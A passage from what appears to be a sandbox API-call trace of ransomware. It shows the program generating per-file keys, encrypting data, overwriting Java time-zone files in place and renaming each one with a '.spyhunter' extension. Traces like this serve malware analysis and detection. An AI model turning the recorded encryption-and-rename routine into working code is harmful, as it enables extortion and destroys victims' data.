dwFlags=0x0, lpMem=0x2eba818 | out: hHeap=0x2c0000) returned 1 [0125.644] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7e0 | out: pbBuffer=0x25cf7e0) returned 1 [0125.644] GetProcessHeap () returned 0x2c0000 [0125.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.644] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7d8*=0x30) returned 1 [0125.644] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mbabane"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.645] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane") returned 58 [0125.645] StrStrW (lpFirst="Mbabane", lpSrch=".txt") returned 0x0 [0125.645] GetProcessHeap () returned 0x2c0000 [0125.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.645] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf79c*=0x41, lpOverlapped=0x0) returned 1 [0125.646] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.646] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf79c*=0x41, lpOverlapped=0x0) returned 1 [0125.646] GetProcessHeap () returned 0x2c0000 [0125.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.646] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.646] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf79c, lpOverlapped=0x0 | out: lpBuffer=0x25cf7dc*, lpNumberOfBytesWritten=0x25cf79c*=0x4, lpOverlapped=0x0) returned 1 [0125.646] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf79c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf79c*=0x30, lpOverlapped=0x0) returned 1 [0125.646] CloseHandle (hObject=0x170) returned 1 [0125.646] GetProcessHeap () returned 0x2c0000 [0125.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.646] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane.spyhunter") returned 68 [0125.646] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mbabane"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mbabane.spyhunter")) returned 1 [0125.647] GetProcessHeap () returned 0x2c0000 [0125.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.647] GetProcessHeap () returned 0x2c0000 [0125.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.647] GetProcessHeap () returned 0x2c0000 [0125.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8ec0 | out: hHeap=0x2c0000) returned 1 [0125.647] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7d8 | out: pbBuffer=0x25cf7d8) returned 1 [0125.647] GetProcessHeap () returned 0x2c0000 [0125.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.647] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7d0*=0x30) returned 1 [0125.648] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maseru"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.648] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru") returned 57 [0125.648] StrStrW (lpFirst="Maseru", lpSrch=".txt") returned 0x0 [0125.648] GetProcessHeap () returned 0x2c0000 [0125.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.648] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf794*=0x59, lpOverlapped=0x0) returned 1 [0125.649] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.649] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x25cf794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf794*=0x59, lpOverlapped=0x0) returned 1 [0125.649] GetProcessHeap () returned 0x2c0000 [0125.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.649] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.649] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf794, lpOverlapped=0x0 | out: lpBuffer=0x25cf7d4*, lpNumberOfBytesWritten=0x25cf794*=0x4, lpOverlapped=0x0) returned 1 [0125.649] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf794, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf794*=0x30, lpOverlapped=0x0) returned 1 [0125.649] CloseHandle (hObject=0x170) returned 1 [0125.649] GetProcessHeap () returned 0x2c0000 [0125.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.650] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru.spyhunter") returned 67 [0125.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maseru"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maseru.spyhunter")) returned 1 [0125.650] GetProcessHeap () returned 0x2c0000 [0125.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.650] GetProcessHeap () returned 0x2c0000 [0125.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.650] GetProcessHeap () returned 0x2c0000 [0125.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8e00 | out: hHeap=0x2c0000) returned 1 [0125.651] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7d8 | out: pbBuffer=0x25cf7d8) returned 1 [0125.651] GetProcessHeap () returned 0x2c0000 [0125.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.651] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7d0*=0x30) returned 1 [0125.651] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maputo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.652] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo") returned 57 [0125.652] StrStrW (lpFirst="Maputo", lpSrch=".txt") returned 0x0 [0125.652] GetProcessHeap () returned 0x2c0000 [0125.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.652] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf794*=0x41, lpOverlapped=0x0) returned 1 [0125.653] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.653] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf794*=0x41, lpOverlapped=0x0) returned 1 [0125.653] GetProcessHeap () returned 0x2c0000 [0125.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.653] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.653] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf794, lpOverlapped=0x0 | out: lpBuffer=0x25cf7d4*, lpNumberOfBytesWritten=0x25cf794*=0x4, lpOverlapped=0x0) returned 1 [0125.653] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf794, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf794*=0x30, lpOverlapped=0x0) returned 1 [0125.653] CloseHandle (hObject=0x170) returned 1 [0125.653] GetProcessHeap () returned 0x2c0000 [0125.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.653] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo.spyhunter") returned 67 [0125.653] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maputo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maputo.spyhunter")) returned 1 [0125.654] GetProcessHeap () returned 0x2c0000 [0125.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.654] GetProcessHeap () returned 0x2c0000 [0125.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.654] GetProcessHeap () returned 0x2c0000 [0125.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8d40 | out: hHeap=0x2c0000) returned 1 [0125.654] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7d0 | out: pbBuffer=0x25cf7d0) returned 1 [0125.654] GetProcessHeap () returned 0x2c0000 [0125.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.654] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7c8*=0x30) returned 1 [0125.654] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\malabo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.655] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo") returned 57 [0125.655] StrStrW (lpFirst="Malabo", lpSrch=".txt") returned 0x0 [0125.655] GetProcessHeap () returned 0x2c0000 [0125.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.655] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf78c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf78c*=0x4d, lpOverlapped=0x0) returned 1 [0125.656] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.656] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x25cf78c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf78c*=0x4d, lpOverlapped=0x0) returned 1 [0125.656] GetProcessHeap () returned 0x2c0000 [0125.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.656] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.656] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf78c, lpOverlapped=0x0 | out: lpBuffer=0x25cf7cc*, lpNumberOfBytesWritten=0x25cf78c*=0x4, lpOverlapped=0x0) returned 1 [0125.656] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf78c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf78c*=0x30, lpOverlapped=0x0) returned 1 [0125.656] CloseHandle (hObject=0x170) returned 1 [0125.656] GetProcessHeap () returned 0x2c0000 [0125.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.657] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo.spyhunter") returned 67 [0125.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\malabo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\malabo.spyhunter")) returned 1 [0125.657] GetProcessHeap () returned 0x2c0000 [0125.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.657] GetProcessHeap () returned 0x2c0000 [0125.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.657] GetProcessHeap () returned 0x2c0000 [0125.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8c80 | out: hHeap=0x2c0000) returned 1 [0125.657] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7d0 | out: pbBuffer=0x25cf7d0) returned 1 [0125.657] GetProcessHeap () returned 0x2c0000 [0125.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.658] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7c8*=0x30) returned 1 [0125.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lusaka"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.659] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka") returned 57 [0125.659] StrStrW (lpFirst="Lusaka", lpSrch=".txt") returned 0x0 [0125.659] GetProcessHeap () returned 0x2c0000 [0125.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.659] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf78c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf78c*=0x41, lpOverlapped=0x0) returned 1 [0125.659] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.659] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf78c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf78c*=0x41, lpOverlapped=0x0) returned 1 [0125.660] GetProcessHeap () returned 0x2c0000 [0125.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.660] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.660] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf78c, lpOverlapped=0x0 | out: lpBuffer=0x25cf7cc*, lpNumberOfBytesWritten=0x25cf78c*=0x4, lpOverlapped=0x0) returned 1 [0125.660] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf78c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf78c*=0x30, lpOverlapped=0x0) returned 1 [0125.660] CloseHandle (hObject=0x170) returned 1 [0125.660] GetProcessHeap () returned 0x2c0000 [0125.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.660] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka.spyhunter") returned 67 [0125.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lusaka"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lusaka.spyhunter")) returned 1 [0125.700] GetProcessHeap () returned 0x2c0000 [0125.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.700] GetProcessHeap () returned 0x2c0000 [0125.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.700] GetProcessHeap () returned 0x2c0000 [0125.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8bc0 | out: hHeap=0x2c0000) returned 1 [0125.700] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7c8 | out: pbBuffer=0x25cf7c8) returned 1 [0125.701] GetProcessHeap () returned 0x2c0000 [0125.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.701] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7c0*=0x30) returned 1 [0125.701] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lubumbashi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.701] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi") returned 61 [0125.701] StrStrW (lpFirst="Lubumbashi", lpSrch=".txt") returned 0x0 [0125.701] GetProcessHeap () returned 0x2c0000 [0125.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.701] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf784, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf784*=0x1b, lpOverlapped=0x0) returned 1 [0125.703] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.703] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25cf784, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf784*=0x1b, lpOverlapped=0x0) returned 1 [0125.703] GetProcessHeap () returned 0x2c0000 [0125.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.703] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.703] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf784, lpOverlapped=0x0 | out: lpBuffer=0x25cf7c4*, lpNumberOfBytesWritten=0x25cf784*=0x4, lpOverlapped=0x0) returned 1 [0125.703] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf784, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf784*=0x30, lpOverlapped=0x0) returned 1 [0125.703] CloseHandle (hObject=0x170) returned 1 [0125.703] GetProcessHeap () returned 0x2c0000 [0125.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.703] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi.spyhunter") returned 71 [0125.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lubumbashi"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lubumbashi.spyhunter")) returned 1 [0125.704] GetProcessHeap () returned 0x2c0000 [0125.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.704] GetProcessHeap () returned 0x2c0000 [0125.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.705] GetProcessHeap () returned 0x2c0000 [0125.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba750 | out: hHeap=0x2c0000) returned 1 [0125.705] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7c8 | out: pbBuffer=0x25cf7c8) returned 1 [0125.705] GetProcessHeap () returned 0x2c0000 [0125.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.705] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7c0*=0x30) returned 1 [0125.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\luanda"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.705] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda") returned 57 [0125.705] StrStrW (lpFirst="Luanda", lpSrch=".txt") returned 0x0 [0125.706] GetProcessHeap () returned 0x2c0000 [0125.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.706] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf784, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf784*=0x41, lpOverlapped=0x0) returned 1 [0125.707] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.707] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf784, 